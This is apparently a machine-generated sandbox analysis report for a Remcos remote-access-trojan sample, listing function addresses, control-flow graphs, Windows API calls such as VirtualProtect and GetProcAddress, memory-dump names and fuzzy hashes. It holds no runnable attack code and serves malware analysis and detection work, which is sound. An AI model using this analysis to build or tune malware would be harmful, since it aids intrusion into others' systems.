                                                                                                                                                                                      • Part of subcall function 2DE9C803: GetProcAddress.KERNEL32(00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C804
                                                                                                                                                                                      • Part of subcall function 2DE9C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C816
                                                                                                                                                                                      • Part of subcall function 2DE9C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction ID: 5de2c0485e8a68a7f611e134c04ba91f22cbc81ac9fa7e4aa1379d77671d42d8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D101D24194B251F8EA3176740C05EFA5FD8DB276A4F111B96E240B6193DDA0A506C3E6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11190 2de9c7a7-2de9c7bc 11191 2de9c82d 11190->11191 11192 2de9c7be-2de9c7c6 11190->11192 11194 2de9c82f-2de9c833 11191->11194 11192->11191 11193 2de9c7c8-2de9c7f6 call 2de9c7e6 11192->11193 11201 2de9c7f8 11193->11201 11202 2de9c86c-2de9c86e 11193->11202 11196 2de9c872 call 2de9c877 11194->11196 11197 2de9c835-2de9c83d GetModuleHandleA 11194->11197 11200 2de9c83f-2de9c847 11197->11200 11200->11200 11203 2de9c849-2de9c84c 11200->11203 11204 2de9c85b-2de9c85e 11201->11204 11205 2de9c7fa-2de9c7fe 11201->11205 11207 2de9c870 11202->11207 11208 2de9c866-2de9c86b 11202->11208 11203->11194 11206 2de9c84e-2de9c850 11203->11206 11212 2de9c85f-2de9c860 GetProcAddress 11204->11212 11213 2de9c800-2de9c80b GetProcAddress 11205->11213 11214 2de9c865 11205->11214 11210 2de9c852-2de9c854 11206->11210 11211 2de9c856-2de9c85a 11206->11211 11207->11203 11208->11202 11210->11212 11211->11204 11212->11214 11213->11191 11215 2de9c80d-2de9c81a VirtualProtect 11213->11215 11214->11208 11216 2de9c82c 11215->11216 11217 2de9c81c-2de9c82a VirtualProtect 11215->11217 11216->11191 11217->11216
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,2DE9C7DD), ref: 2DE9C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2DE9C860
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: GetModuleHandleA.KERNEL32(2DE9C7DD), ref: 2DE9C7E6
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: GetProcAddress.KERNEL32(00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C804
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C816
                                                                                                                                                                                      • Part of subcall function 2DE9C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C82A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction ID: ae9c072a641592b6f0fcab14533232dcc5e5e0d0c93ea353c9c0ed995a723023
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                    • Instruction Fuzzy Hash: C721276140B281EFE732AB744C04AF66FD8DB132A4F194696D140FB143DDA8A546C3A2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11218 2de9c803-2de9c80b GetProcAddress 11219 2de9c82d 11218->11219 11220 2de9c80d-2de9c81a VirtualProtect 11218->11220 11223 2de9c82f-2de9c833 11219->11223 11221 2de9c82c 11220->11221 11222 2de9c81c-2de9c82a VirtualProtect 11220->11222 11221->11219 11222->11221 11224 2de9c872 call 2de9c877 11223->11224 11225 2de9c835-2de9c83d GetModuleHandleA 11223->11225 11227 2de9c83f-2de9c847 11225->11227 11227->11227 11228 2de9c849-2de9c84c 11227->11228 11228->11223 11229 2de9c84e-2de9c850 11228->11229 11230 2de9c852-2de9c854 11229->11230 11231 2de9c856-2de9c85e 11229->11231 11233 2de9c85f-2de9c865 GetProcAddress 11230->11233 11231->11233 11235 2de9c866-2de9c86e 11233->11235 11237 2de9c870 11235->11237 11237->11228
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C804
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C816
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,2DE9C7F4,2DE9C7DD), ref: 2DE9C82A
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,2DE9C7DD), ref: 2DE9C838
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 2DE9C860
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2152742572-0
                                                                                                                                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction ID: 333e37af44ec904547d2fc780e718c71edc2626903c89398e9ecd58cc38bda3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF0F64154B340FCFA3275B41C45EFA5FCC8B276A4B101A56E200F7183DC95A50683F6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11238 2de95ce1-2de95cf5 11239 2de95d02-2de95d1d LoadLibraryExW 11238->11239 11240 2de95cf7-2de95d00 11238->11240 11242 2de95d1f-2de95d28 GetLastError 11239->11242 11243 2de95d46-2de95d4c 11239->11243 11241 2de95d59-2de95d5b 11240->11241 11244 2de95d2a-2de95d35 LoadLibraryExW 11242->11244 11245 2de95d37 11242->11245 11246 2de95d4e-2de95d4f FreeLibrary 11243->11246 11247 2de95d55 11243->11247 11249 2de95d39-2de95d3b 11244->11249 11245->11249 11246->11247 11248 2de95d57-2de95d58 11247->11248 11248->11241 11249->11243 11250 2de95d3d-2de95d44 11249->11250 11250->11248
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,2DE91D66,00000000,00000000,?,2DE95C88,2DE91D66,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue), ref: 2DE95D13
                                                                                                                                                                                    • GetLastError.KERNEL32(?,2DE95C88,2DE91D66,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue,2DE9E190,FlsSetValue,00000000,00000364,?,2DE95BC8), ref: 2DE95D1F
                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,2DE95C88,2DE91D66,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue,2DE9E190,FlsSetValue,00000000), ref: 2DE95D2D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                    • Opcode ID: 8e4c7dadeb15aac58f66b029110ac4593da629e68dd60111ced2f852a847e24c
                                                                                                                                                                                    • Instruction ID: 1077e89f282a1b84e2dbabb0f88c3e4c0d16becb55d122eca0d1341c6c7ffaca
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4c7dadeb15aac58f66b029110ac4593da629e68dd60111ced2f852a847e24c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 720188376172726BC7124A689C4DFDB77A9AF05BA57104621F90AF7280DB34D901C6D4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 03347B20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,03347BA5,?,?,00000000,00000000), ref: 03347B81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                                                    • API String ID: 544645111-2063912171
                                                                                                                                                                                    • Opcode ID: b7e4909df8ae733c5cf26478a1101a9f614afe80b149f49437704822300a6dd3
                                                                                                                                                                                    • Instruction ID: f2ac7d0b1bd4820900623e66035fd189590df11e353663d696b2304639b5a5b8
                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e4909df8ae733c5cf26478a1101a9f614afe80b149f49437704822300a6dd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A012C79A04348BFD701EFA4DCD1E5EB7ECEB4A610F508465F924E7640D770AA418A24
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE94F2F Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 11276 2de94f2f-2de94f42 11277 2de94f5c-2de94f5e 11276->11277 11278 2de94f60-2de94f71 call 2de9637b 11277->11278 11279 2de94f44-2de94f46 11277->11279 11286 2de94fe0 11278->11286 11287 2de94f73-2de94f76 11278->11287 11280 2de94f49-2de94f4b 11279->11280 11281 2de94f48 11279->11281 11283 2de94f4e-2de94f53 11280->11283 11281->11280 11283->11283 11285 2de94f55-2de94f5a 11283->11285 11285->11277 11289 2de94fe2-2de94ff2 call 2de9571e 11286->11289 11288 2de94fca-2de94fcd 11287->11288 11291 2de94f78-2de94f7a 11288->11291 11292 2de94fcf 11288->11292 11294 2de94f7d-2de94f82 11291->11294 11292->11289 11294->11294 11295 2de94f84-2de94f8f 11294->11295 11296 2de94fc8 11295->11296 11297 2de94f91-2de94f94 call 2de9637b 11295->11297 11296->11288 11299 2de94f99-2de94f9f 11297->11299 11300 2de94fd1-2de94fdf call 2de95000 call 2de9571e 11299->11300 11301 2de94fa1-2de94fb0 call 2de9544d 11299->11301 11300->11286 11306 2de94ff3-2de94fff call 2de962bc 11301->11306 11307 2de94fb2-2de94fc7 call 2de9571e 11301->11307 11307->11296
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                    • Opcode ID: 59200efd0ea4c459d3184a57f5d45ea5adfd882c309ecb97db535bd7a438a5c1
                                                                                                                                                                                    • Instruction ID: eceef4cc2a9db1d6e6772495c5e25210440f2b2224b33bf7ca86fa50b599bcff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 59200efd0ea4c459d3184a57f5d45ea5adfd882c309ecb97db535bd7a438a5c1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C21C47660E3866FEB15CF749C40FF97BA8DF4226CF25419DEA44BB245EE328A018354
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE96ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 2DE96AF0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                    • Opcode ID: 5e60f3b80a84c0bb9f6ae5d4d83607246eff51ff303be95c2b88c5781c15458c
                                                                                                                                                                                    • Instruction ID: 18075017bf297c210a39675d26cb7995f5c191e56b2504c1c3045937bc54c5f1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e60f3b80a84c0bb9f6ae5d4d83607246eff51ff303be95c2b88c5781c15458c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C3414CF15063DC9ADB228F248C80FE6BBF9EB15308F1444EEE589A6142F6359946CF60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 2DE95F8A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                    • Opcode ID: 8c8ec908d09b5e3b31966042d56516501cb02d0f881dcb3d5ca2e99e6e2151da
                                                                                                                                                                                    • Instruction ID: 2d7f67421301bbd75b6b2dceada9e9a0684decd835eafa8f500ba96fa9b18559
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c8ec908d09b5e3b31966042d56516501cb02d0f881dcb3d5ca2e99e6e2151da
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69011332506119BBCF029F91CD01EEE3FB6EF08760F014018FA0936220CB369931AB85
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE95D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                                                                    • Opcode ID: fccace9c0fea79330210c9cda898c20af66c0ca4bbc2d8140d180e5460fae9c0
                                                                                                                                                                                    • Instruction ID: 4260fe08ac4a7da48b191e99e946d9a04f7854545dffb7f0ebc9e1d6bebe276d
                                                                                                                                                                                    • Opcode Fuzzy Hash: fccace9c0fea79330210c9cda898c20af66c0ca4bbc2d8140d180e5460fae9c0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E0E532607228B7D7116B618D14FFF7BA5DB14E10F014059FB0676312CE25691185D9
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE93AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • try_get_function.LIBVCRUNTIME ref: 2DE93B06
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: try_get_function
                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                    • API String ID: 2742660187-671089009
                                                                                                                                                                                    • Opcode ID: 098187e7c4ac8805c938ce04bbe7f5c09ff22b48d35e9b1cc6df4b3f0c6c8ab3
                                                                                                                                                                                    • Instruction ID: e94c8468833a5d3413e754ee9d9f1475ab28be8131b23dd68b4c8a2f4b772205
                                                                                                                                                                                    • Opcode Fuzzy Hash: 098187e7c4ac8805c938ce04bbe7f5c09ff22b48d35e9b1cc6df4b3f0c6c8ab3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD05B3364B938A3C61025A55D04BFD7B95D7009B6F400062FB4DB7619DD95797046CD
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE96E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE969F3: GetOEMCP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A1E
                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,2DE96CC1,?,00000000), ref: 2DE96E94
                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,2DE96CC1,?,?,?,2DE96CC1,?,00000000), ref: 2DE96EA7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                    • Opcode ID: a2474eeb8af0eede0b6cc6289ec61ec0eb976f3399813fac817fa88bad34c7d8
                                                                                                                                                                                    • Instruction ID: 093ebfe5b8efdc855742b13a587f75a4a1dff10e2c4e3e70612751ba78f202c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: a2474eeb8af0eede0b6cc6289ec61ec0eb976f3399813fac817fa88bad34c7d8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7651DFB1A0A2D59EDB118F71C480AFABBE5EF41308F14806FD186BA252DB7596468B90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE96C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: GetLastError.KERNEL32(?,?,2DE96C6C), ref: 2DE95AFA
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: _free.LIBCMT ref: 2DE95B2D
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: SetLastError.KERNEL32(00000000,?,?,2DE96C6C), ref: 2DE95B6E
                                                                                                                                                                                      • Part of subcall function 2DE95AF6: _abort.LIBCMT ref: 2DE95B74
                                                                                                                                                                                      • Part of subcall function 2DE96D7E: _abort.LIBCMT ref: 2DE96DB0
                                                                                                                                                                                      • Part of subcall function 2DE96D7E: _free.LIBCMT ref: 2DE96DE4
                                                                                                                                                                                      • Part of subcall function 2DE969F3: GetOEMCP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A1E
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE96CD7
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE96D0D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                    • Opcode ID: 3281961d132be10e5be187fc8e83bb9a06c9acbe83bf1ed5b891e5f7008f498e
                                                                                                                                                                                    • Instruction ID: 13a8d136bf658bb2657b513ebee5c8ccffdf55b4f4f665fcef23bbf7b1c7ac59
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3281961d132be10e5be187fc8e83bb9a06c9acbe83bf1ed5b891e5f7008f498e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931B0B19092C8AFD701EBA9C540BD9BBF1EF40324F22419EE914BB291EF759E41CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 2DE9731F Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 2DE9736B
                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 2DE9737D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                                    • Opcode ID: e4b4a36b1e1ec984d519bfa840d7198032051a9ff59a9dfa69cb68e06f86a701
                                                                                                                                                                                    • Instruction ID: 887f19baebd3239aecfce93c4c4459329b74eb99bc32df47a66d60cb4b1e643a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4b4a36b1e1ec984d519bfa840d7198032051a9ff59a9dfa69cb68e06f86a701
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B11DD3110575286C723DE3D8C86AE6BAD5B786174B340F29DDB6F66E1CB34D5898240
                                                                                                                                                                                    Uniqueness

